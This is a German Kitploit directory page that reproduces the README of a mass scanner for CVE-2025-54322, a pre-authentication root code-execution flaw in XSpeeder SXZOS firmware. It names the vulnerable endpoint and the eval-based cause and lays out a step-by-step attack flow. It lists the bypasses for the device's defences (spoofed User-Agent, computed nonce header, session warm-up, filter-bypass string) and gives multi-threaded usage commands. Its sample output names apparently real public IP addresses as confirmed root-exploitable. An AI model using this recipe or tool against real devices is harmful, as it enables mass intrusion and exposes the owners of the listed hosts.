Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-54322 — CVE-2025-54322 - XSpeeder SXZOS Pre-Auth RCE 0day-Schnellfinder | Kitploit
Tools/GitHubGitHub/sachinart/cve-2025-54322
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubsachinart/cve-2025-54322

CVE-2025-54322

CVE-2025-54322 - XSpeeder SXZOS Pre-Auth RCE 0day-Schnellfinder

Repository anzeigen
8210vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-54322 - XSpeeder SXZOS Pre-Auth-RCE-Scanner

License Python CVE

Ein multi-threaded Schwachstellenscanner für CVE-2025-54322, eine nicht authentifizierte Remote-Code-Ausführungssicherheitslücke in der XSpeeder SXZOS-Firmware, die weltweit etwa 70.000+ Hosts betrifft.

📋 Inhaltsverzeichnis

  • Über die Schwachstelle
  • Funktionen
  • Installation
  • Verwendung
  • Ausgabe
  • Haftungsausschluss
  • Danksagungen
  • Autor

🔍 Über die Schwachstelle

CVE-2025-54322 ist eine kritische Pre-Authentifizierungs-Remote-Code-Ausführungssicherheitslücke, die in der XSpeeder SXZOS-Firmware entdeckt wurde, die SD-WAN-Geräte, Router und Edge-Netzwerkausrüstung antreibt.

Details zur Schwachstelle

  • CVE-ID: CVE-2025-54322
  • Anbieter: XSpeeder (chinesischer Netzwerkausrüster)
  • Betroffenes Produkt: SXZOS-Firmware
  • Schwachstellentyp: Pre-Authentifizierungs-Remote-Code-Ausführung (RCE)
  • CVSS-Score: 9,8+ (Kritisch)
  • Angriffsvektor: Netzwerk
  • Erforderliche Berechtigungen: Keine
  • Benutzerinteraktion: Keine
  • Auswirkung: Vollständige Systemkompromittierung mit Root-Rechten

Technische Details

Die Schwachstelle befindet sich in der Django-basierten Weboberfläche der SXZOS-Firmware:

  1. Angreifbarer Endpunkt: /?title=ABC&oIp=XXX&chkid=[base64_payload]
  2. Ursache: Unsichere Verwendung der Python-Funktion eval() auf base64-dekodierten Benutzereingaben
  3. Authentifizierung: Keine erforderlich (Pre-Auth)
  4. Ausführungskontext: Root-Rechte
  5. Betroffene Hosts: ~70.000+ öffentlich zugängliche Geräte weltweit

Angriffsablauf

1. Berechne zeitbasiertes Nonce für X-SXZ-R-Header
2. Wärme Session über Endpunkt /webInfos/ auf
3. Erstelle schädliche Nutzlast mit Umgehungsstring (#sUserCodexsPwd)
4. Base64-kodiere Nutzlast
5. Sende Exploit mit genau 3 Query-Parametern
6. Server dekodiert und wertet Nutzlast aus
7. Befehle werden mit Root-Rechten ausgeführt

Umgehungsmechanismen

Der Exploit umgeht mehrere Verteidigungsschichten:

  • Nginx User-Agent-Prüfung: Gefälscht mit SXZ/2.3
  • Zeitbasiertes Nonce: Berechneter Header X-SXZ-R: [0-6]
  • Session-Anforderung: Aufgewärmt über /webInfos/
  • String-Filter: Umgangen mit #sUserCodexsPwd-Kommentar
  • Parameteranzahl: Hält genau 3 Query-Parameter ein

✨ Funktionen

  • ✅ Multi-threaded Scannen - Gleichzeitiges Testen mehrerer Ziele
  • ✅ SSL-Umgehung - Handhabt selbstsignierte und ungültige Zertifikate
  • ✅ Intelligente Wiederholungslogik - 2 Wiederholungsversuche pro Ziel
  • ✅ Saubere Ausgabe - Zeigt nur anfällige Hosts
  • ✅ Echtzeit-Dateischreiben - Speichert Ergebnisse sofort in vuln-confirm.txt
  • ✅ Fortschrittsverfolgung - Live-Fortschrittsaktualisierungen alle 50 Hosts
  • ✅ Thread-sichere Operationen - Sichere gleichzeitige Datei- und Konsolenoperationen
  • ✅ Präzise Erkennung - Regex-basierte Validierung der Befehlsausführung
  • ✅ PoC-konforme Logik - Folgt der ursprünglichen Exploit-Methodik

🚀 Installation

Voraussetzungen

  • Python 3.7 oder höher
  • pip-Paketmanager

Einrichtung

# Repository klonen
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322

# Erforderliche Abhängigkeiten installieren
pip install -r requirements.txt

Abhängigkeiten

Erstellen Sie eine requirements.txt-Datei:

requests>=2.31.0
urllib3>=2.0.0

📖 Verwendung

Grundlegende Verwendung

python3 scanner.py targets.txt

Erweiterte Verwendung

# Mit benutzerdefinierter Thread-Anzahl scannen (Standard: 10)
python3 scanner.py targets.txt 20

# Mit maximaler Thread-Anzahl für schnellere Ergebnisse scannen
python3 scanner.py targets.txt 50

# Mit konservativer Thread-Anzahl scannen
python3 scanner.py targets.txt 5

Format der Zielliste

Erstellen Sie eine targets.txt-Datei mit einem Ziel pro Zeile:

https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local

Beispielsitzung

$ python3 scanner.py targets.txt 20

╔═══════════════════════════════════════════════════════════════╗
║     XSpeeder SXZOS (CVE-2025-54322) RCE Scanner              ║
║     Pre-Auth Root RCE Vulnerability Checker                   ║
║     Showing: VULNERABLE HOSTS ONLY                            ║
╚═══════════════════════════════════════════════════════════════╝

[*] Loaded 2338 targets from targets.txt
[*] Using 20 concurrent threads
[*] Vulnerable hosts will be saved to: vuln-confirm.txt
[*] Starting scan...

======================================================================
[+] VULNERABLE: https://27.40.80.93:4433
[+] Status: VULNERABLE - RCE Confirmed
[+] HTTP Status: 500
[+] Output: uid=0(root) gid=0(root)
======================================================================

[*] Progress: 50/2338 | Found: 12 vulnerable
[*] Progress: 100/2338 | Found: 24 vulnerable

======================================================================
[*] SCAN COMPLETE
======================================================================
[*] Total Time: 890.45 seconds
[*] Total Targets Scanned: 2338
[*] Vulnerable Hosts Found: 156
[*] Success Rate: 6.67%
======================================================================

📊 Ausgabe

Konsolenausgabe

Der Scanner zeigt an:

  • Echtzeit-Entdeckungen anfälliger Hosts
  • Fortschrittsaktualisierungen alle 50 Hosts
  • Endgültige Zusammenfassung mit Statistiken
  • Saubere, organisierte Ergebnisse

Dateiausgabe (vuln-confirm.txt)

XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts
Scan started: 2025-12-27 15:30:45
======================================================================

https://27.40.80.93:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------

======================================================================
Scan completed: 2025-12-27 15:45:30
Total scanned: 2338
Vulnerable: 156
Time taken: 890.45 seconds

🎯 Thread-Empfehlungen

ZielanzahlEmpfohlene ThreadsErwartete Zeit
1-105 Threads~1-2 Min
10-5010 Threads~3-5 Min
50-10020 Threads~5-10 Min
100-50030 Threads~10-20 Min
500+40-50 Threads~20+ Min

⚠️ Haftungsausschluss

Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.

Rechtlicher Hinweis

  • Testen Sie nur Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung haben
  • Unautorisierter Zugriff auf Computersysteme ist in den meisten Rechtsordnungen illegal
  • Der Autor übernimmt keinerlei Haftung für die missbräuchliche Verwendung dieses Tools
  • Durch die Nutzung dieses Tools stimmen Sie zu, es verantwortungsvoll und ethisch zu verwenden
  • Dieses Tool dient ausschließlich der Sicherheitsforschung und dem Penetrationstest

Verantwortungsvolle Offenlegung

Wenn Sie anfällige Systeme entdecken:

  1. Nutzen Sie sie nicht über die Bestätigung der Schwachstelle hinaus aus
  2. Melden Sie die Ergebnisse sofort dem Systembesitzer
  3. Geben Sie angemessene Zeit für die Behebung
  4. Veröffentlichen Sie keine spezifischen anfälligen Hosts öffentlich

Ethische Nutzung

Tool herunterladen